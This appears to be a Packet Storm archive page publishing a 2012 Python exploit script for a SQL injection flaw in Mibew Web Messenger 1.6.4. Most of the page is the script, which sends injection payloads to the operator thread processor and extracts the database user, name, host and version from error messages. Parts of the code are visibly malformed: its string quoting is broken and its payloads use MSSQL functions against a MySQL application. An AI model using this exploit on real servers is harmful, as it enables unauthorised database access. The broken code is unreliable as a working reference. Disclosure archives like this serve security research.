exploit the possibilities

Mibew Web Messenger 1.6.4 SQL Injection

Mibew Web Messenger 1.6.4 SQL Injection
Posted Aug 6, 2012
Authored by Ucha Gobejishvili

Mibew Web Messenger version 1.6.4 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, web, sql injection
MD5 | 0b21148eed49642d328485cd54ba794b

Mibew Web Messenger 1.6.4 SQL Injection

Change Mirror Download
#!/usr/bin/python
#Author: Ucha Gobejishvili
#Timeline: 2012-08-05 Bug Discovered
# 2012-08-05 Public Disclosured
#Vendor: Mibew Web Messenger (http://mibew.org/ )
#Version: Mibew Messenger 1.6.4
#Demo: http://demo.mibew.org
#Introduction:
#Mibew Messenger (also known as Open Web Messenger) is an open-#source live
support application written in PHP and MySQL. It #enables one-on-one chat
assistance in real-time directly from #your website.

#Abstract:

#Discovered SQL injection Vulnerabilities on the Mibew Messenger #v.1.6.4.
A SQL Injection vulnerability is detected on the Mibew #Messenger v.1.6.4
The vulnerabilities allows an remote attacker #to execute own sql commands
on the affected applicationdbms. #Successful exploitation can result in
dbms, web-server or #application compromise.
# python Mibew.py -p localhost:8080 -t localhost:8500 -d /Patch/

import sys, httplib, urllib2, urllib, re
from optparse import OptionParser

usage = "./%prog [<options>] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -t localhost:8500 -d
/coldcal/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
help="Directory path to the CMS")
(options, args) = parser.parse_args()

def banner():
print "\n\t|
----------------------------------------------------------- |"
print "\t| Mibew Web Messenger SQL Injection Vulnerability|"
print "\t| |\n"

if len(sys.argv) < 5:
banner()
parser.print_help()
sys.exit(1)

def getProxy():
try:
pr = httplib.HTTPConnection(options.proxy)
pr.connect()
proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
except(socket.timeout):
print "\n(-) Proxy Timed Out"
sys.exit(1)
except(),msg:
print "\n(-) Proxy Failed"
sys.exit(1)
return proxy_handler

def setTargetHTTP():
if options.target[0:7] != 'http://':
options.target = "http://" + options.target
return options.target
def getRequest(exploit):
if options.proxy:
try:
proxyfier = urllib2.build_opener(getProxy())
check = proxyfier.open(options.target+options.directory+exploit).read()
except urllib2.HTTPError, error:
check = error.read()
except socket.error:
print "(-) Proxy connection failed"
sys.exit(1)
else:
try:
req = urllib2.Request(options.target+options.directory+exploit)
check = urllib2.urlopen(req).read()
except urllib2.HTTPError, error:
check = error.read()
except urllib2.URLError:
print "(-) Target connection failed, check your address"
sys.exit(1)
return check

basicInfo = {'user: ':'user_name()', 'name: ':'db_name()', 'hostname:
':'host_name()','version: \n\n\t':'@@version'}

def basicSploit(info):
return "/operator/threadprocessor.php?threadid=1+and+1=convert(int," + info
+ ")--"

if __name__ == "__main__":
banner()
options.target = setTargetHTTP()
print "(+) Exploiting target @: %s" % (options.target+options.directory)
if options.proxy:
print "\n(+) Testing Proxy..."
print "(+) Proxy @ %s" % (options.proxy)
print "(+) Building Handler.."

for key in basicInfo:
getResp = getRequest(basicSploit(basicInfo[key]))
if re.findall("the nvarchar value '", getResp):
dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type
int')[0]
print "\n(!) Found database %s%s" % (key, dbInfo.rstrip())

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close